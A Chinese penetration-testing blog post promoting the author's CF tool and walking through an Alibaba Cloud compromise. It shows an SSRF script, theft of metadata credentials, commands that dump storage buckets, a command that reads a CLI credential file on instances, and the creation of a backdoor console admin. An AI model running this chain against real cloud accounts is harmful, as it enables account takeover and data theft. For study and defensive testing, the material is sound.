我用 CF 打穿了他的云上内网

 0x01 前言      

最近在做项目的时候,测到了一个部署在云上的存在 Laravel UEditor SSRF 漏洞的站点,并且发现这个 SSRF 漏洞可以读取到临时凭证,这不巧了,正好最近写了一个云环境利用的工具。

开始之前这里先简单介绍一下这个工具,CF 是这个工具的名字,通过它可以很方便的进行云上内网渗透,比如一键在所有实例上执行命令、一键接管控制台、一键列出云服务资源等等。

项目地址: https://github.com/teamssix/cf

使用手册: https://wiki.teamssix.com/cf

十分建议在使用 CF 的时候,边使用边参考 CF 的使用手册,发现 CF 更多功能,那话不多说,下面咱们就开始吧。

0x01 打点,但,是云环境

picture.image

一开始还是信息收集,首先通过指纹扫描发现在目标范围内的一个站点使用了 Laravel 框架,接着测试发现该站点存在 Laravel UEditor SSRF 漏洞。 这里的 SSRF 漏洞触发点在 UEditor 编辑器的上传图片功能中,下面我们尝试让服务器从 https://baidu.com?.jpg 获取图片。

picture.image

然后我们读取返回的文件地址,通过返回的内容可以看到服务端确实访问到了 https://baidu.com?.jpg,说明这里确实**存在 SSRF 漏洞。**

picture.image

通过查询该域名所属 IP,发现该站点位于云上,那么我们就可以利用这个 SSRF 漏洞去获取实例的元数据信息 ,但是这样每次获取数据都要手动发两个数据包就很麻烦,所以这里简单搞个脚本。


        
  `import sys`
  `import requests`
 
  `ssrf_url = sys.argv[1]`
  `headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.3100.0 Safari/537.36"}`
 
  `req1 = requests.get("https://your_target.com/laravel-u-editor-server/server?action=catchimage&source[]=" + ssrf_url,headers=headers)`
  `req2 = requests.get(req1.json()["list"][0]["url"],headers=headers)`
 
  `print(req2.text)`
 
      

通过查询该站点的 IP 得知该站点位于阿里云上,阿里云的元数据地址为:http://100.100.100.200/latest/meta-data,我们尝试获取一下。

picture.image

可以看到成功获取到了元数据信息 ,并且值得注意的是,在元数据信息里还有 ram/目录,这就意味着这台实例存在临时访问凭证,也就是说存在被进一步利用的可能性。

我们一步步打开 ram/目录,在 http://100.100.100.200/latest/meta-data/ram/security-credentials/laravel-test-role找到了临时访问凭证

picture.image

不同于传统的打点,云环境的打点在我看来,除了传统打点的类型外,拿到云服务的 Access Key 也应该可以被称之为打点,那么在打到点后,接下来就可以开始内网横向了。

0x02 云上内网横向,也得细心呀

当我们拿到临时访问凭证后,首先要做的就是得知道这个凭证具备哪些权限 。 我们先把凭证配置到 CF 里,CF 下载地址:https://github.com/teamssix/cf/releases


        
 `cf configure` 
 
      

picture.image

查看当前凭证的权限:


        
 `cf ls permissions` 
 
      

picture.image

可以看到当前权限具有 OSS 的全部权限,并且可以使用 CF 的「列出 OSS 资源」以及「下载 OSS 资源」的功能。 这里先列出 OSS 资源看看:


        
 `cf oss ls` 
 
      

picture.image

可以看到在该凭证下有四个存储桶,一个是公开的,三个是私有的。 查看一下存储桶里有哪些文件:


        
 `cf oss ls -b bucketName` 
 
      

picture.image

利用 CF 下载文件,如果想下载全部对象,则不指定 -k参数即可。


        
 `cf oss get -b bucketName -k objectKey` 
 
      

picture.image

大概翻了一下存储桶里的文件,在公有存储桶里大部分是图片,私有存储桶里有几十个压缩包文件和大量图片等等,这几百张图片里只发现了几张有敏感信息的图片,整体来说价值不大。 后来过了一会儿还是另外一位师傅在私有存储桶里一个个的翻文件,最后在几十个压缩包里终于找到了一个有高价值的配置文件,于是事情开始出现了转机,不得不说,还是得细心啊。 查看这个配置文件,发现在配置文件里写的是「OSS 相关配置信息」

picture.image

但是当我们配置上这个 AK 后,发现这个 AK 还具有 ECS 的权限。

注:在后来拿下管理员权限后,我们发现这个用户被配置到了具备 ECS 权限的用户组里去了,所以这里才会有 ECS 的权限。

picture.image

先用 CF 看一下有哪些 ECS 实例:


        
 `cf ecs ls` 
 
      

picture.image

使用 CF 一键获取临时访问凭证:


        
 `cf ecs exec -m` 
 
      

picture.image

发现只有一个实例可以获取到临时访问凭证,而且这个有临时访问凭证的实例就是上述存在 SSRF 漏洞的那台机器。 于是通过临时访问凭证横向的这条路就断了,那就继续在实例上信息收集吧,看看能不能找到什么有价值的信息,最后发现有一台实例安装了 aliyun cli 工具,并且配置过 AK ,那么这样一来我们就可以通过查看 aliyun cli 工具的配置文件获取到这个 AK。


        
 `cf ecs exec -c "cat ~/.aliyun/config.json"` 
 
      

picture.image

将 CF 配置上这个 AK,并查看权限:

picture.image

发现这个 AK 的权限要比之前的几个都要大,这个 AK 具有 AliyunRAMFullAccess权限 ,这也就意味着我们可以创建一个管理员后门用户,并通过该用户去接管控制台。

0x03 拿下管理员,相当于拿下“域控”?

使用 CF 一键接管控制台:


        
  `cf console`
 
      

picture.image

在浏览器中,打开控制台登录地址,并输入用户名、密码进行登录。

picture.image

在访问控制里,可以看到当前权限为AdministratorAccess,这也就意味着我们已经拿到了该租户的管理员权限。

picture.image

在控制台中看看这个账号下的 OSS 对象存储服务:

picture.image

其他的 ECS、RDS 等等云服务也都是可以查看并操作的,这里就不再一一截图了,到这里为止,其实在我看来就相当于已经拿下了传统内网中的“域控”权限。 基本上这个云账号下的绝大部分操作都是可以执行的了,只不过在控制台下有些操作需要二次校验,但其实还是有办法绕过的,绕过的方法也很简单,相信你能猜到 ~

最后还有一些值得注意的地方:

  • 在 ECS 实例中执行一些高危命令,例如反弹 Shell 这类,可能会引发云盾告警。

  • CF 接管控制台会创建一个后门用户,在使用完后,记得取消接管,使用 cf console cancel命令即可取消接管,后门用户也会随之删除。

  • 为了充分表达云上内网横向的过程以及更加完整的展示 CF 的使用,文中少部分内容非真实发生且部分内容进行了省略。

  • 出于保护目标但又想学习交流的目的,以上云上环境均为个人搭建,不代表目标的实际情况。

0x04 总结

picture.image

记得以前大家一起做项目的时候,那个时候如果有人打点打到云上的主机时,就会在协作平台里标注一句「这个是云主机,不用花太多时间去深入」。 但随着企业业务的不断上云,打点打到云上主机的概率也在可感知的越来越大,似乎传统内网的奶酪正在不断变少,这时如果不去寻找新的奶酪(指云上内网横向),也许在不久的将来就会陷入两难的境地。 因此本文既是在介绍我写的这个云环境利用框架 CF 工具,也是在描绘一种在新场景下的内网横向手法,这里的内网横向不仅仅是从这台机器到那台机器,而是从这个云服务到那个云服务,例如从 OSS 到 ECS 再到 RAM 等等,在这其中又包含了从这个机器到那台机器,例如多台 ECS 实例之间的内网横向。 现在 xx 在即,也希望我写的这个工具以及这篇文章能够为你在实战中带来新的启发和新的思路,如果感觉 CF 这个工具似乎还可以的话,师傅你不妨动动小手给 CF 点个 Star,嘿嘿~ 。

CF 项目地址: https://github.com/teamssix/cf

如有侵权,请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell

「 超详细 | 分享 」手把手教你如何进行内网渗透

神兵利器 | siusiu-渗透工具管理套件

一款功能全面的XSS扫描器

实战 | 一次利用哥斯拉马绕过宝塔waf

BurpCrypto: 万能网站密码爆破测试工具

快速筛选真实IP并整理为C段 -- 棱眼

自动探测端口顺便爆破工具t14m4t

渗透工具|无状态子域名爆破工具(1秒扫160万个子域)

查看更多精彩内容,还请关注 橘猫学安全:

每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“ 再看

0
0
0
0
评论
未登录
暂无评论